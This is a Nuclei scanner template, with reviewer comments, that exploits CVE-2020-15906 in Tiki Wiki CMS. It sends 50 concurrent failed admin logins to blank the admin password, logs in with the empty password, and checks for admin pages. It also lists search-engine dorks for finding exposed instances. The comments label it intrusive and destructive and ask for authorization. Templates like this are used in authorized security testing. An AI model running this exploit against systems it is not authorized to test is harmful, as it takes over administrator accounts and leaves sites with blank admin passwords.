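# Nuclei template for CVE-2020-15906 (Tiki Wiki CMS Groupware < 21.2).
#
# INTRUSIVE: this template does not merely fingerprint the flaw, it exploits it.
# Step 2 deliberately sends 50 wrong passwords for `admin`; on a vulnerable
# instance that blanks the admin password, and step 3 then logs in with the
# empty password. The target is left with an empty admin password until someone
# changes it. Run only with authorization, and rotate/restore the admin password
# afterwards.
#
# NOTE(review): the `# digest:` trailer at the end of the file was computed over
# the original template; any edit to this file (including comments) invalidates
# it, and nuclei will report the template as unsigned/tampered until it is
# re-signed.
id: CVE-2020-15906

info:
  name: Tiki Wiki CMS GroupWare - Authentication Bypass
  author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
  severity: critical
  description: |
    tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
  impact: |
    Unauthenticated attackers can trigger 50 failed login attempts to reset the admin password to blank, gaining complete administrative access to the Tiki Wiki CMS and all its content.
  remediation: |
    Upgrade to Tiki Wiki CMS version 21.2 or later.
  reference:
    - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15906
    - https://github.com/Z0fhack/Goby_POC
    - https://github.com/bakery312/Vulhub-Reproduce
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15906
    cwe-id: CWE-307
    epss-score: 0.85573
    epss-percentile: 0.99387
    cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
  metadata:
    vendor: tiki
    product: tiki
    shodan-query: title:"Tiki Wiki CMS"
    fofa-query: title="Tiki Wiki CMS"
    # The closing quote was missing, which left the dork unbalanced.
    google-query: intitle:"Tiki Wiki CMS"
  # `intrusive` added so this state-changing template is excluded by runs that
  # filter out intrusive templates (see the header comment).
  tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass,vuln,intrusive

http:
  # 1. Fetch the login page to obtain the anti-CSRF `ticket` the login form
  #    requires; it is reused for every attempt in step 2.
  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: ticket1
        internal: true
        group: 1
        regex:
          # `[^"]*` rather than `.*` so the capture cannot run past the closing
          # quote when other attributes follow `value=` on the same line
          # (e.g. minified HTML).
          - 'class="ticket" name="ticket" value="([^"]*)"'

  # 2. Trigger the lockout: 50 distinct wrong passwords for `admin`, fired
  #    concurrently (batteringram + 50 threads). On a vulnerable instance this
  #    is what blanks the admin password, i.e. the destructive step.
  - raw:
      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login_scr.php

        ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    # Exactly 50 values: the lockout threshold from the description.
    payloads:
      attempt:
        - nkQ0yYzgF5Er
        - P5UdGflH48W3
        - xFq7vKNLmhZp
        - 8zKtGnh4dW5R
        - CfXp2VbQz8Er
        - Lh3K6vPzM9Xn
        - bG4RxHpY2MdQ
        - 7zNtKh3WqF5L
        - Y8rQ2GpLx9Kn
        - C7KzLmP5X9Vh
        - v3LdX8GmQ5Kn
        - W4NzX6PqL3Ft
        - Q5GhY2VrX7Jk
        - r9KdL4PhY6Gm
        - 8XjVq5LhZ2Kr
        - L5WnQ9KzY8Pr
        - M2XdL5GrY9Kh
        - N6YzP8WkL5Xt
        - G7JqX5VbM2Kp
        - H4PrX8LkY6Gm
        - J5LhY2VqX9Kr
        - 8GrX5NqL2KhY
        - K4WnY9PzM8Xt
        - Q2XkL5PrY8Vh
        - 9JhL4VqX5GrM
        - N2XdY5PqL9Kh
        - W4LhY8KzM5Xt
        - G5JqX2VrY9Kp
        - H9PrL5XkY2Gm
        - L8WnX5KzY9Pr
        - M4XkY2LqV5Gt
        - N5XdL9PqY8Kr
        - P8XnL5VrY2Kh
        - Q4JqX9LhY5Gr
        - V7LkX5PrY2Gt
        - L2WnY9KzX8Pr
        - M9XdL5PqY4Kh
        - N8LhY2VqX5Gr
        - Q7XkL5PrY9Gm
        - X4LhY8WnM5Kp
        - G2JqL5VrY9Kt
        - H7PrX8KzY2Gm
        - J4LhY5VqX9Kr
        - N9XkY2LqP5Gt
        - W8LhY5PrX2Kz
        - G4JqL5XkY9Vr
        - P5WnY2KzL8Gt
        - M7XkY9LhP2Gr
        - Q2JqL5VrY8Kh
        - 2JqL5VrY8Kh
    attack: batteringram
    threads: 50

  # 3. Log in as admin with the now-empty password. A fresh ticket is taken from
  #    the first response of this sequence (body_1) and used in the POST.
  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login.php

        ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    extractors:
      - type: regex
        part: body_1
        name: ticket2
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="([^"]*)"'

  # 4. Confirm the session from step 3 reaches an admin-facing index page.
  #    Assumes nuclei carries the session cookie across http entries within
  #    the template — TODO confirm for the nuclei version in use (older
  #    releases required an explicit `cookie-reuse: true`).
  - raw:
      - |
        GET /tiki-index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      # NOTE(review): "Home", "Search", "Wiki" and "Settings" may also appear in
      # the menu shown to anonymous visitors, so this matcher alone is a weak
      # signal; verify it against an unauthenticated instance before trusting a
      # hit that comes only from it. The second matcher's admin-only strings are
      # the stronger evidence.
      - type: word
        part: body
        words:
          - "System Menu"
          - "Home"
          - "Search"
          - "Wiki"
          - "File Galleries"
          - "Settings"
        condition: and

      - type: word
        part: body
        words:
          - "Show on admin log-in"
          - "Tiki Setup"
        condition: and
# digest: 4a0a0047304502210097531dfcb1131f7ccb459c2abb9aca9c16d4f1404c9941c1ab87529364232f6902204f4ef0872b324a77f9f97032d147e33d509234f03234e3993433cd2f727bd75d:922c64590222798bb761d5b6d8e72950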